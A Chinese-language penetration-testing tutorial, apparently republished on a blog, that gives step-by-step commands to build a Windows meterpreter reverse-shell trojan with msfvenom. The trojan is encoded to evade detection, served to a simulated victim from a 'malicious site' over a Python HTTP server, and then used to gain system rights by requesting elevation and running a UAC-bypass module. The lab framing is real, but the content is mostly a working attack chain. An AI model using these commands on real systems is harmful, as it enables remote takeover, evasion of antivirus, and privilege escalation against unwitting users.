生成遠程控制木馬以及提權


遠程控制木馬以及提權

Kail攻擊機IP: 192.168.199.216

Win7靶機IP:  192.168.199.132

Kali Linux 2中提供了多個可以用來產生遠程控制被控端程序的方式,但是其中最為簡單強大的方法應該要數Msfvenom命令了。這個命令是著名滲透測試軟件Metasploit的一個功能。

以前舊版本的Metasploit中提供了兩條關於遠程控制被控端程序的命令,其中msfpayload負責用來生成攻擊載荷,msfencode負責對攻擊載荷進行編碼。新版本的Metasploit中將這兩條命令整合成為了msfvenom命令,下面給出了msfvenom的幾個常見的使用參數。

這里面的參數很多,但是實際使用起來很簡單,例如我們如果只是希望生成一個簡單的被控端程序,那么只需要使用參數-p、-f和-o即可,分別指定要使用的被控端程序(通常可以使用Metasploit中內置的被控端程序)

舉例:

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.169.130 lport=5000 -f exe -o /root/payload.exe

生成一個遠程控制木馬,注意參數不要錯

1 msfvenom  -a x86 -platform windows -p(pyaload)  windows/meterpreter/reverse_tcp  lhost=kaliip  port=4444 -b"\x00"(刪掉null字符截斷) 
-e(編碼器,很多,自找) x86/shikata_ga_nai -i(次數) 10 -f(form格式) exe >msf.exe(在root下生成一個msf文件即遠控木馬) 2 3 msfvenom -a x86 -platforms windows -p windows/meterpreter/reverse_tcp lhost=192.168.199.216 lport=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe >msf.exe

在root文件下可以看到一個exe文件

試一試handler監聽模塊,並配置監聽腳本

use exploit/multi/handler

默認的payload是generic/shell_reverse_tcp,所以需要改,並開始監聽run

接下來可以直接利用python語句掛一個簡單http服務器

1 python -m SimpleHTTPServer 800(大小寫注意)

模擬用戶在惡意網站192.168.199.216:800下了一個軟件,安裝並運行。

 

點擊運行,可以看到反彈了一個meterpreter。

但只是普通管理員的權限,無法創建用戶,也無法更換系統權限。

 

我們可以通過提高程序的運行級別、繞過UAC,和提權漏洞進行更換系統權限。

下面只展示提高程序運行級別和繞過UAC兩種方法。

 

提高程序的運行級別(特殊模塊)

主動提問模塊,主動向用戶申請系統權限。info查看需要的參數(require參數為yes必填),

Sessions1是剛才handler時沒有改payload產生的shell。我們使用沒有系統權限的session3

Win7自動彈窗,點擊是,得到會話窗口

 

繞過UAC提權(特殊模塊)

也可以利用另外一些模塊use exploit/windows/local/bypassuac

有很多相關的,選一個最簡單的

可以用info查看模塊原理

use exploit/windows/local/bypassuac

payload默認是反彈tcp

show options

只需要補上session

使用沒系統權限的的session3

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM